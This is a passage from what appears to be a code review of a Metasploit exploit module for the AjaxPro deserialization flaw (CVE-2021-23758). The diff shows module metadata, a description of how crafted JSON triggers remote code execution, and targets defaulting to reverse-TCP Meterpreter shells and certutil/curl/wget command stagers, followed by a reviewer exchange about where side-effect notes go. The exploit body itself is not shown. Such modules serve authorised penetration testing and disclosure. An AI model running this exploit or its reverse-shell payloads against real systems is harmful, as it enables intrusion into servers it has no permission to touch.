modules/exploits/windows/http/ajaxpro_deserialization_rce.rb

```diff
@@ -0,0 +1,193 @@
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'AjaxPro Deserialization Remote Code Execution',
+        'Description' => %q{
+          This module leverages an insecure deserialization of data to get
+          remote code execution on the target OS in the context of the user
+          running the website which utilized AjaxPro.
+
+          To achieve code execution, the module will construct some JSON data
+          which will be sent to the target. This data will be deserialized by
+          the AjaxPro JsonDeserializer and will trigger the execution of the
+          payload.
+
+          All AjaxPro versions prior to 21.10.30.1 are vulnerable to this
+          issue, and a vulnerable method which can be used to trigger the
+          deserialization exists in the default AjaxPro namespace.
+
+          AjaxPro 21.10.30.1 removed the vulnerable method, but if a custom
+          method that accepts a parameter of type that is assignable from
+          `ObjectDataProvider` (e.g. `object`) exists, the vulnerability can
+          still be exploited.
+
+          This module has been tested successfully against official AjaxPro on
+          version 7.7.31.1 without any modification, and on version 21.10.30.1
+          with a custom vulnerable method added.
+        },
+        'Author' => [
+          'Hans-Martin Münch (MOGWAI LABS)', # Discovery
+          'Jemmy Wang' # MSF Module
+        ],
+        'References' => [
+          ['CVE', '2021-23758'],
+          ['URL', 'https://mogwailabs.de/en/blog/2022/01/vulnerability-spotlight-rce-in-ajax.net-professional/']
+        ],
+        'DisclosureDate' => '2021-12-03',
+        'License' => MSF_LICENSE,
+        'Platform' => ['windows'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :win_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/meterpreter/reverse_tcp',
+                'CMDSTAGER::FLAVOR' => 'certutil'
+              },
+              'CmdStagerFlavor' => %w[vbs certutil debug_write debug_asm tftp psh_invokewebrequest curl wget lwp-request],
+              'Notes' => {
+                'SideEffects' => [SCREEN_EFFECTS, IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+              }
```

Comment:
Unfortunately we don't currently support target-specific notes like this, and we can only define them globally right now.

i.e. We'll have to move this all into the above `Notes` section unfortunately

Reply:
OK! I added `ARTIFACTS_ON_DISK` to the module level, and removed the `Notes` from target level.